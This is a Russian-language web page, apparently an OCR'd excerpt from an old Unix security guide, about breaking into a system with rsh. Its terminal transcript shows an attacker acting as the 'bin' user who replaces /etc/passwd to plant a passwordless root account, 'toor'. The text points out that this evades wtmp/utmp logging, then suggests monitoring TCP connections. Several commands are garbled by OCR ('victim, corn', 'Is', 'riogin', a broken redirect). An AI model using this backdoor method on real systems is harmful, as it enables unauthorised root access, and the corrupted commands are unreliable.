Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
Проникновение в систему с помощью rsh
Поскольку специальный пользователь bin, как правило, имеет доступ к
Ключевым файлам и каталогам, то, зарегистрировавшись как bin, может
Изменить файл паролей так, чтобы получить привилегии доступа root.
Например:
evil % whoami
Bin
evil % rsh victim, corn csh -i
Warning: no access to tty; thus no job control in this shell...
victim % Is -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor:: 0:1: суперпользователь без пароля:/:/bin/sh; cat
pw.old) " passwd
victim % `D
evil % riogin victim, corn -I toor Welcome to victim, corn!
victim #
Несколько замечаний no поводу деталей приведенного выше метода: "rsh
victim.com csh -i" используется для проникновения в систему, так как при
Таком запуске csh не оставляет никаких следов в файлах учета wtmp или
Utmp, делая rsh невидимым для finger или who. Правда, при этом удаленный
Командный процессор не подключается к псевдотерминалу, и полноэкранные
Программы (например, редакторы) работать не будут. На многих системах
Атака с помощью rsh (в случае успешного завершения) оставалась абсолютно
Незамеченной, поэтому мы рекомендуем использовать анализатор внешних
Tcp-нодключений, который поможет обнаружить такую деятельность.
Дата публикования: 2014-11-04; Прочитано: 422 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!